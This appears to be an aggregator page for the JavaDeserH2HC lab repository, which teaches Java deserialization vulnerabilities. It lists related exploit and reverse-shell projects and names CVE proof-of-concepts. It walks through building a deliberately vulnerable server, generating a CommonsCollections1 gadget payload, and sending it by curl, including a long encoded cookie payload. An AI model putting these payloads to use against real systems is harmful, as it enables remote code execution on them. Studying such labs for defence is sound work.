joaomatosf / Javadeserh2hc
Licence: mit
Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).
Stars: ✭ 361
Programming Languages
java
68154 projects - #9 most used programming language
Projects that are alternatives of or similar to Javadeserh2hc
Ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Stars: ✭ 4,808 (+1231.86%)
Mutual labels: deserialization, jvm, vulnerability, poc
Php7 Opcache Override
Security-related PHP7 OPcache abuse tools and demo
Stars: ✭ 237 (-34.35%)
Mutual labels: vulnerability, poc
Exphub
Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340
Stars: ✭ 3,056 (+746.54%)
Mutual labels: vulnerability, poc
Jexboss
JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
Stars: ✭ 2,008 (+456.23%)
Mutual labels: deserialization, reverse-shell
Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (-75.9%)
Mutual labels: vulnerability, reverse-shell
Reverse Shell
Reverse Shell as a Service
Stars: ✭ 1,281 (+254.85%)
Mutual labels: vulnerability, reverse-shell
Xray
一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档
Stars: ✭ 6,218 (+1622.44%)
Mutual labels: vulnerability, poc
rsGen
rsGen is a Reverse Shell Payload Generator for hacking.
Stars: ✭ 71 (-80.33%)
Mutual labels: reverse-shell, vulnerability
CVE-2020-11651
CVE-2020-11651: Proof of Concept
Stars: ✭ 41 (-88.64%)
Mutual labels: poc, vulnerability
CVE-2020-1611
Juniper Junos Space (CVE-2020-1611) (PoC)
Stars: ✭ 25 (-93.07%)
Mutual labels: poc, vulnerability
Bitp0wn
Algorithms to re-compute a private key, to fake signatures and some other funny things with Bitcoin.
Stars: ✭ 59 (-83.66%)
Mutual labels: vulnerability, poc
Poccollect
Poc Collected for study and develop
Stars: ✭ 15 (-95.84%)
Mutual labels: vulnerability, poc
Pub
Vulnerability Notes, PoC Exploits and Write-Ups for security issues disclosed by tintinweb
Stars: ✭ 217 (-39.89%)
Mutual labels: vulnerability, poc
Cve 2020 10199 cve 2020 10204
CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面。CVE-2020-10199 and CVE-2020-10204 Vul Tool with GUI.
Stars: ✭ 20 (-94.46%)
Mutual labels: vulnerability, poc
Pentesting
Misc. Public Reports of Penetration Testing and Security Audits.
Stars: ✭ 24 (-93.35%)
Mutual labels: poc, vulnerability
Vulscan
vulscan 扫描系统:最新的poc&exp漏洞扫描,redis未授权、敏感文件、java反序列化、tomcat命令执行及各种未授权扫描等...
Stars: ✭ 486 (+34.63%)
Mutual labels: vulnerability, poc
dheater
D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the Diffie-Hellman key exchange.
Stars: ✭ 142 (-60.66%)
Mutual labels: poc, vulnerability
CVE-2021-33766
ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit
Stars: ✭ 37 (-89.75%)
Mutual labels: poc, vulnerability
Lab for Java Deserialization Vulnerabilities
This content is related to the paper written for the 12th edition of H2HC magazine. See full paper in: https://www.h2hc.com.br/revista/
Slides and video of the talk will be available soon.
Um overview sobre as bases das falhas de desserialização nativa em ambientes Java (JVM)
An overview of deserialization vulnerabilities in the Java Virtual Machine (JVM)
Content
The lab contains code samples that help you understand deserialization vulnerabilities and how gadget chains exploit them. The goal is to provide a better understanding so that you can develop new payloads and/or better design your environments.
There is also a vulnerable testing application (VulnerableHTTPServer.java), which helps you test your payloads.
Slides
Examples (PoC's)
- PoC CVE-2017-7504 - JBossMQ JMS Invocation Layer (https://access.redhat.com/security/cve/cve-2017-7504)
- PoC CVE-2017-12149 - JBoss 6.X and EAP 5.X (https://access.redhat.com/security/cve/cve-2017-12149)
- PoC Exploiting struts2-rest XStream Deserialization with Reverse Shell
Lab Usage Examples
First of all you need to read the full paper. Then review the sample codes and use the vulnerable testing application to understand how payloads work.
Getting JDK
If you dont want to go to the Oracle page and register, you can download the JDK directly from me in: http://www.joaomatosf.com/rnp/?prefix=rnp/java_files/
As root, run:
# cd /opt
# curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
# tar zxvf jdk-8u20-linux-x64.tar.gz
# rm -rf /usr/bin/java*
# ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
# java -version
java version "1.8.0_20"
Getting codes:
$ git clone https://github.com/joaomatosf/JavaDeserH2HC.git
$ cd JavaDeserH2HC
Compiling and executing Vulnerable Web Application:
$ javac VulnerableHTTPServer.java -XDignore.symbol.file
$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer
* =============================================================== *
* Simple Java HTTP Server for Deserialization Lab v0.01 *
* https://github.com/joaomatosf/JavaDeserH2HC *
* =============================================================== *
You can inject java serialized objects in the following formats:
1) Binary in HTTP POST (ie \xAC\xED). Ex:
$ curl 127.0.0.1:8000 --data-binary @ObjectFile.ser
2) Base64 or Gzip+Base64 via HTTP POST parameters. Ex:
$ curl 127.0.0.1:8000 -d "ViewState=H4sICAeH..."
$ curl 127.0.0.1:8000 -d "ViewState=rO0ABXNy..."
3) Base64 or Gzip+Base64 in cookies. Ex:
$ curl 127.0.0.1:8000 -H "Cookie: JSESSIONID=H4sICAeH..."
$ curl 127.0.0.1:8000 -H "Cookie: JSESSIONID=rO0ABXNy..."
4) Base64 of AES-CBC encrypted with hardcoded Apache Shiro key. Ex:
$ curl 127.0.0.1:8000 -H "Cookie: rememberMe=MTIzNDU2Nzg...
5) XML for XStream RCE vulnerability/serialization. Ex:
$ curl 127.0.0.1:8000 -d @file.xml
OBS: To test gadgets in specific libraries, run with -cp param. Ex:
$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer
==================================================================
JRE Version: 1.8.0_77
[INFO]: Listening on port 8000
Testing payloads
Compiling example1 that works in applications with commons-collections3.2.1 in the classpath and JRE < 8u72:
$ javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java
Generating payload:
$ java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 'touch /tmp/h2hc_2017'
Saving serialized object in ExampleCommonsCollections1.ser
Exploiting vulnerable server:
Sending the payload in binary format via HTTP POST:
$ rm -rf /tmp/h2hc_2017
$ curl 127.0.0.1:8000/ --data-binary @ExampleCommonsCollections1.ser
Data deserialized!
$ ls -all /tmp/h2hc_2017
-rw-r--r-- 1 joao joao 0 Sep 13 22:34 /tmp/h2hc_2017
Sending the payload in Gzip+Base64 format via HTTP Cookies:
$ rm -rf /tmp/h2hc_2017
$ gzip ExampleCommonsCollections1.ser
$ base64 -w0 ExampleCommonsCollections1.ser.gz
$ curl 127.0.0.1:8000/ -H "cookie: JSESSIONID=H4sICMeVuVkAA0V4YW1wbGVDb21tb25zQ29sbGVjdGlvbnMxLnNlcgCVVD1MFEEUfrd3iKDEAxVNiITGqER2kZhIuEKRBCFZlCAS4hU67M3dLuzOrjOz5x0ohY0tBQmxUQut/EmMtYWxMBEl0UZDZ2HURBMtrHVmd+9uAf+44u7tzfu+933vvdn7X6GOUehhPlEpztvY4CoixOWIWy5R+6vhMCm6RhANIZKzMT334seO3cvzdxVQdNjuYGcK0wlk+5hx2KFPoyLSfG7Z2gjyMjqkeNnDHJrDAxuRgjZgI8YyJY9dBYAENMkTVUJUASlR2BP8IVOrykapWyq/P7Da8TI9sKxAQoeEyWF/jDTK1DbIlYUuwTyAcNvp0oKKPGSYWDVcx3EJE7+2BFoydpCn6mi2LHSQD4vXbpbTi0lZrD6PDO7SMofDuqDQQgototBiFNo4RYTlXeqElSn0/aNm3ieSm6kDJrIIzsUIup8vfTk4u5QShrPQZMVORKu7spuT4tMI8jcxcciTic7v747uvaEAlDwxqZQwk/lvM+KJI8JjhJPFheZ+5dFiML4Gq5LBoSU2xjNT04JLyC1SaK7twZhPuOVgqH0211u5FTOYxtRc//RzZu7KSq8CySzUWf20IHq6M7tRig7brBHMTTd3Gjl4rdqznFqkkMmKlFFEkTMudl3QtGR/s+2i/xF9aCmiX1iZvJVmh+xKlxUOjQXMI8MC1BIHhWT3Wt8+XH51vjoZ4NAgMKFKXy57u2QSLUzXoKHW29/u9M5mHp8MoMUgNbgdrQGsTcK8aih4t1hB5/5EGppYM5aAtG0daWK9+6hzD95MfPy8b+5UxUmSQ702ZRGNieutdAnqXdz1DbND446nmT2mcaGn+8gxDilcwkZVVSIoqrHKzgQvkyHETHGR6+pXnz5rvfg6CcogNNouyg0Gl3kYGrhJMTNdO1fyjp8I9V/eKr7SgZOSsNpeUxx7OY5hjomM1hiXEvp+AaGU2MlXBQAA"
Data deserialized!
$ ls -all /tmp/h2hc_2017
-rw-r--r-- 1 joao joao 0 Sep 13 22:47 /tmp/h2hc_2017
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].